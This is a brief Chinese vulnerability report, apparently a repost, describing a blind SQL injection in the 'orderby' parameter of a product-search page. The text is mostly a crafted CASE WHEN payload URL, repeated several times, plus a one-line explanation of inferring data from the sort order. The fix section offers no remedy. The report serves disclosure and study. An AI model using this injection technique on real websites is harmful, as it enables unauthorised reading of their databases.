网址:
?classchg=&cnt=0&curpage=1&filterattr=4%7C6&filterstype=2%7C2&filtervalue=11%7C2000-3000&from=1&idlist=&keyvalue=&libid=9&mod=searchhea&orderby=F19%20desc&pagenum=20&site=digi&subcategory=%26%23191%3B%26%23213%3B%26%23181%3B%C2%A1%C3%82&subcategoryfid=2&subcategoryid=11&tplname=search_result2.shtml&type=data
注入参数orderby
?classchg=&cnt=0&curpage=1&filterattr=4|6&filterstype=2|2&filtervalue=11|2000-3000&from=1&idlist=&keyvalue=&libid=9&mod=searchhea&pagenum=20&site=digi&subcategory=%810%867%810%889%810%858%A1%C2&subcategoryfid=2&subcategoryid=11&tplname=search_result2.shtml&type=data&orderby=F17,%28case%20when%281=2%29%20then%20F17%20else%20F19%20end%29%20desc
?classchg=&cnt=0&curpage=1&filterattr=4|6&filterstype=2|2&filtervalue=11|2000-3000&from=1&idlist=&keyvalue=&libid=9&mod=searchhea&pagenum=20&site=digi&subcategory=%810%867%810%889%810%858%A1%C2&subcategoryfid=2&subcategoryid=11&tplname=search_result2.shtml&type=data&orderby=F17,%28case%20when%281=2%29%20then%20F17%20else%20F19%20end%29%20desc
根据when() 中1=1 1=2 返回数据的排序方式进行盲注。
漏洞证明:?classchg=&cnt=0&curpage=1&filterattr=4|6&filterstype=2|2&filtervalue=11|2000-3000&from=1&idlist=&keyvalue=&libid=9&mod=searchhea&pagenum=20&site=digi&subcategory=%810%867%810%889%810%858%A1%C2&subcategoryfid=2&subcategoryid=11&tplname=search_result2.shtml&type=data&orderby=F17,%28case%20when%281=2%29%20then%20F17%20else%20F19%20end%29%20desc
?classchg=&cnt=0&curpage=1&filterattr=4|6&filterstype=2|2&filtervalue=11|2000-3000&from=1&idlist=&keyvalue=&libid=9&mod=searchhea&pagenum=20&site=digi&subcategory=%810%867%810%889%810%858%A1%C2&subcategoryfid=2&subcategoryid=11&tplname=search_result2.shtml&type=data&orderby=F17,%28case%20when%281=2%29%20then%20F17%20else%20F19%20end%29%20desc
根据when() 中1=1 1=2 返回数据的排序方式进行盲注。
修复方案:
应该懂得!
作者:Jannock
,涛涛电脑知识网,涛涛电脑知识网